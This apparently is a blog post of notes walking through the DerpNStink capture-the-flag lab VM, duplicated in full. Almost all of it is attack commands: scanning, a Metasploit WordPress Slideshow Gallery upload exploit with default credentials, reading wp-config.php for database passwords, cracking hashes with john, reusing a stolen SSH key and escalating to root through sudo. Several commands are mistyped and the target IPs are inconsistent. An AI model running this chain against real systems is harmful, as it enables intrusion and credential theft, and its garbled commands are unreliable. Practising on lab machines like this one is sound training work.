VM 2
============ steps to follow ======================
netdiscover -r 192.168.239.9/24
nmap -sS -AT4 192.178.239.129 /OS and apps
nikto -host 192.168.239.129 / Find apache details
enum4linux 192.168.56.102 / get more details
searchsploit vsftpd 3.0.2 //search for exploits
ssh root@192.168.239.131 / no response. xd
searchsploit Slideshow Gallery
dirb http://192.168.239.129 / search the web server
GO TO THE WEBSERVER ... view source code & view robots.txt for flags
echo "192.168.239.131 derpnstink.local" >> /etc/hosts
wpscan -u http://192.168.139.131/weblog -enumerate at -enumerate ap --enumerate u \Get users
---------------------------------------------
Metasploit / Start Exploitation
---------------------------------------------
msfconsole
search Slideshow Gallery
use exploit/unix/webapp/wp_slideshowgallery_upload
show options
set RHOST target_IP
set targeturi /weblog
set WP_USER admin
set WP_PASSWORD admin
expliot //sessions is opened
sysinfo
cd /var/www/html/weblog
ls /wp-config.php
cat wp-config.php /get db username and pass
/from there get wp-admin pass (hashed)
/save those files into a hash file
john hash.txt --wordlist wordlist.txt
-------------- Meterpreter prompt
shell
python -c 'import.pty; pty.spawn("/bin/bash")'
su stinky /go throught the folders.. u will get private key
chmod 400 stinky.key
ssh -i stinky@192.168.239.131
su -l /view permission
scp -i stinky.key stinky@192.168.239.131:/home/stinky/docs/sa.pcap /tmp/dermp.pcap
open the pcap in wireshark
login to another account
sudo -l / check the level of permissions
echo "/bin/bash" > binaries/derpy.sh
chmod +x binaries/derpy.sh
sudo ./binaries/derpy.sh
============ steps to follow ======================
netdiscover -r 192.168.239.9/24
nmap -sS -AT4 192.178.239.129 /OS and apps
nikto -host 192.168.239.129 / Find apache details
enum4linux 192.168.56.102 / get more details
searchsploit vsftpd 3.0.2 //search for exploits
ssh root@192.168.239.131 / no response. xd
searchsploit Slideshow Gallery
dirb http://192.168.239.129 / search the web server
GO TO THE WEBSERVER ... view source code & view robots.txt for flags
echo "192.168.239.131 derpnstink.local" >> /etc/hosts
wpscan -u http://192.168.139.131/weblog -enumerate at -enumerate ap --enumerate u \Get users
---------------------------------------------
Metasploit / Start Exploitation
---------------------------------------------
msfconsole
search Slideshow Gallery
use exploit/unix/webapp/wp_slideshowgallery_upload
show options
set RHOST target_IP
set targeturi /weblog
set WP_USER admin
set WP_PASSWORD admin
expliot //sessions is opened
sysinfo
cd /var/www/html/weblog
ls /wp-config.php
cat wp-config.php /get db username and pass
/from there get wp-admin pass (hashed)
/save those files into a hash file
john hash.txt --wordlist wordlist.txt
-------------- Meterpreter prompt
shell
python -c 'import.pty; pty.spawn("/bin/bash")'
su stinky /go throught the folders.. u will get private key
chmod 400 stinky.key
ssh -i stinky@192.168.239.131
su -l /view permission
scp -i stinky.key stinky@192.168.239.131:/home/stinky/docs/sa.pcap /tmp/dermp.pcap
open the pcap in wireshark
login to another account
sudo -l / check the level of permissions
echo "/bin/bash" > binaries/derpy.sh
chmod +x binaries/derpy.sh
sudo ./binaries/derpy.sh
Comments
Post a Comment